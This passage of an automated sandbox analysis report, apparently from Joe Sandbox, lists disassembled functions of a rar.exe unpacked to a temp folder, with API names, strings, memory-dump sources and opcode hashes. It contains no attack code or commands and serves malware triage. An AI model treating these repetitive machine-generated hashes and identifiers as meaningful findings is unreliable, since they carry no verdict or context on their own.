                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentPriorityThread$ClassProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1171435874-0
                                                                                                                                                                                                                                        • Opcode ID: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                                        • Instruction ID: c210a9d39bc349a15fa3d74740bd4a5cb5bdbede008b78eb589935eefdb56f4d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb35a308c9672c43725447ff3ecbbf89940673d79f69deb8a20185b15c97b697
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23113071B1E642EAEAA68F12A4C427C6261EF84740F20407BC60AD7685DF2CBC474604
                                                                                                                                                                                                                                        Function 00007FF6AA1E5630 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLast$abort
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1447195878-0
                                                                                                                                                                                                                                        • Opcode ID: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                                        • Instruction ID: 65195d108fdd635602d14509a1b444ae40fb5bb2a27258133ee38c405914867a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc6db4589d12c74431344df6db0fda3963e5f3476a1a0d6bb2a5a407689805e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C01CC20B0B642E7FABAA331965513C11924F4A7A4F4805BFE91F86FD2ED2DAC434200
                                                                                                                                                                                                                                        Function 00007FF6AA1CB850 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 502429940-0
                                                                                                                                                                                                                                        • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                                        • Instruction ID: 21e3ec1cd2b30ae58d9275b792182d3cc46444aab73bc9ed4c611584133c58c0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE11C632509E81E3E3559F21D94065D6330FB85790F000232D76D932A5CF39F872C704
                                                                                                                                                                                                                                        Function 00007FF6AA1E58A4 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: gfffffff
                                                                                                                                                                                                                                        • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                                        • Opcode ID: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                                        • Instruction ID: b1c5b3fbadba5e49fd962bc8d7b82e0d1a721ddf67bf332d9bc406f9c7a73f6b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21452402729b0f04a42bea99b9d48ecd324c6ba459a3d9785fd7d0df1cc262de
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08914C62B0A3C6D6EB368F25918037C6B96AB567E4F088176CB8D47B95DE3CD913C301
                                                                                                                                                                                                                                        Function 00007FF6AA1BCFCF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6AA19CBED,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1CB730
                                                                                                                                                                                                                                        • new.LIBCMT ref: 00007FF6AA1BCFD9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                                                        • String ID: rar$rev
                                                                                                                                                                                                                                        • API String ID: 3472027048-2145959568
                                                                                                                                                                                                                                        • Opcode ID: b4a3dbcb548f429c64c95219bff2b126912035a4d4646d0106d3222159d6f56a
                                                                                                                                                                                                                                        • Instruction ID: 1f795b36650b4d270137ca243c27868150b2598aa68fe03c76d40c0c5da2dc6b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4a3dbcb548f429c64c95219bff2b126912035a4d4646d0106d3222159d6f56a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6A10422A0B692E6EA1ADB20C4542BC6365FF44784F4546B7DA5D8B7D7EF2CED42C300
                                                                                                                                                                                                                                        Function 00007FF6AA1DF7CC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: *
                                                                                                                                                                                                                                        • API String ID: 3215553584-163128923
                                                                                                                                                                                                                                        • Opcode ID: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                        • Instruction ID: 1b990cf47a02fa7368ba82500f8ca81d0fc27ac8249d88e156e82c5955419b2f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16a705be2b1e487b59333a8e93db6455a755c474a96de4fc0b7d69b7c81f417b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51715172D0A751E6E76A8F28804123C37E1FB45F48F2411B7EA4AC6294DF39DE82C795
                                                                                                                                                                                                                                        Function 00007FF6AA1E5CD4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                        • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                        • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                        • Instruction ID: 82283e2babb1ec86d409a5201078fcab7709b3e0db6bf35e701b0224b68a00bd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4510862B197C196E7368B359941379BB92EB42BA4F088276C69CC7FD5CE2CD846C700
                                                                                                                                                                                                                                        Function 00007FF6AA1B4534 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF6AA1A475B,?,00000000,?,?,00007FF6AA1A4620,?,00000000,?), ref: 00007FF6AA1B4633
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                        • String ID: UNC$\\?\
                                                                                                                                                                                                                                        • API String ID: 1611563598-253988292
                                                                                                                                                                                                                                        • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                        • Instruction ID: 53739d8903b5bf0a72da6545b8bf4b1ad8cac97e3f7ad02d190cb98e98609c60
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6419011B0A682E0EA27AB51E5011B92392AF45BD4F81C6B3DD9DC77D7EE2CED47C600
                                                                                                                                                                                                                                        Function 00007FF6AA1E3B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe
                                                                                                                                                                                                                                        • API String ID: 3307058713-2419423084
                                                                                                                                                                                                                                        • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                                        • Instruction ID: 7562150a0d87b2a8ca5666a5e5873174533cb0a6a1d719f0b99d8ce2933f35cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE41D232A0A652E9E726DF21D9400B86794EF46BC4B0840B7E90E87F45DF3DE8929300
                                                                                                                                                                                                                                        Function 00007FF6AA1C7C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFilewcsstr
                                                                                                                                                                                                                                        • String ID: System Volume Information\
                                                                                                                                                                                                                                        • API String ID: 1592324571-4227249723
                                                                                                                                                                                                                                        • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                                        • Instruction ID: 5c92eb690b957559797dd805357fe383601a27878ecf4a3a41c4692035915647
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A431B221A1B682E5EB56DF21A1506BE67A0AF45BC0F4440B2EE8D87796DE7CF8438700
                                                                                                                                                                                                                                        Function 00007FF6AA194888 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
